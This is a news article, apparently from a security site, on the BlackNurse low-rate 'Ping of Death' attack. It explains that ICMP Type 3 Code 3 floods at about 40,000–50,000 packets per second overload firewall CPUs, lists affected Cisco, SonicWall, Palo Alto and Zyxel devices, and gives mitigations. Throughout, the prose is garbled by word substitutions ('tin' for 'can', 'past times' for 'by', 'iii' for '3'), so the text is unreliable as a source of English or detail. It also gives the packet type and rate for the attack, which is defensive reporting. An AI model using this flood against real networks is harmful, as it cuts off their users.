Researchers at TDC Security Operations Center select discovered a novel assault technique that lonely attackers with express resources (in this case, a laptop as well as at to the lowest degree 15Mbps of bandwidth) tin role to knock large servers offline.
Dubbed a BlackNurse attack or the low-rate "Ping of Death" attack, the technique tin last used to launch several low-volume DoS attacks past times sending peculiarly formed Internet Control Message Protocol (ICMP) packets, or 'pings' that overwhelm the processors on server protected past times firewalls from Cisco, Palo Alto Networks, with others.
ICMP is a protocol used past times routers as well as other networking devices to transportation as well as have fault messages.
According to a technical written report [PDF] published this week, the BlackNurse assault is to a greater extent than traditionally known equally a "ping overflowing attack" as well as is based on ICMP Type iii (Destination Unreachable) Code iii (Port Unreachable) requests.
These requests are parcel replies typically returned to ping sources when the finish port of a target is 'unreachable.'
Here's How the BlackNurse assault Works:
By sending a Type iii ICMP packets with a code of 3, a hacker tin drive a Denial of Service (DoS) state past times overloading the CPUs of sure enough types of server firewalls, regardless of the character of network connection.
The BlackNurse traffic book is real small, ranging from fifteen Mbps to eighteen Mbps (or almost 40,000 to 50,000 packets per second), which is laughable compared to record-breaking 1.1 Tbps DDoS attack recorded against French internet service provider OVH inwards September.
However, TDC explained this was non the problem, equally the major number is a steady stream of 40K to 50K ICMP packets that achieve the victim's network equipment as well as proceed crashing the target device.
The practiced news? The researcher said, "When an assault is ongoing, users from the LAN side volition no longer last able to send/receive traffic to/from the Internet. All firewalls we've select seen recover when the assault stops."
In other words, this low-volume DoS technique remains effective because it is non flooding the firewall with traffic, but rather it is pushing high charge onto the CPU, effectively knocking servers offline fifty-fifty if they've tons of network capacity.
Researchers said BlackNurse should non last confused with 'ping overflowing attacks based on ICMP Type viii Code 0' – regular ping traffic. Researchers explain:
"The BlackNurse assault attracted our attending because inwards our anti-DDoS solution nosotros experienced that fifty-fifty though traffic speed as well as packets per 2nd were real low, this assault could proceed our customers' operations down."
"This fifty-fifty applied to customers with large network uplinks as well as large firm firewalls inwards place. We had expected that professional person firewall equipment would last able to handgrip the attack."
Products Affected
The BlackNurse assault industrial plant against the next products:
- Cisco ASA 5506, 5515, 5525 (default settings)
- Cisco ASA 5550 (legacy) as well as 5515-X (latest generation)
- Cisco Router 897 (can last mitigated)
- SonicWall (misconfiguration tin last changed as well as mitigated)
- Some unverified Palo Alto
- Zyxel NWA3560-N (wireless assault from LAN side)
- Zyxel Zywall USG50
How to Mitigate the BlackNurse Attack?
The practiced news? There are ways to care dorsum the BlackNurse attacks.
TDC suggested unopen to mitigations as well as SNORT IDS rules that could last used to regain BlackNurse attacks. Moreover, proof-of-concept (PoC) code posted past times an OVH safety engineer on GitHub tin too last used past times network admins to exam their equipment against BlackNurse.
In guild to mitigate the BlackNurse attacks on firewalls as well as other equipment, TDC recommended users to configure a listing of trusted sources for which ICMP is allowed. However, the best agency to mitigate the assault is to exactly disable ICMP Type iii Code iii on the WAN interface.
Palo Alto Networks has too issued an warning:
"We recommend that yous grant permission for the ICMP unreachable message type (type 3). Denying ICMP unreachable messages disables ICMP Path MTU discovery, which tin halt IPSec as well as PPTP traffic."Moreover, independent software vendor NETRESEC too published a detailed analysis of BlackNurse inwards its postal service titled, "The 90's called as well as wanted their ICMP overflowing assault back."
Besides all these, the Sans Institute has too issued its ain brief write-up on the BlackNurse attack, discussing the assault as well as what users should produce inwards guild to mitigate it.
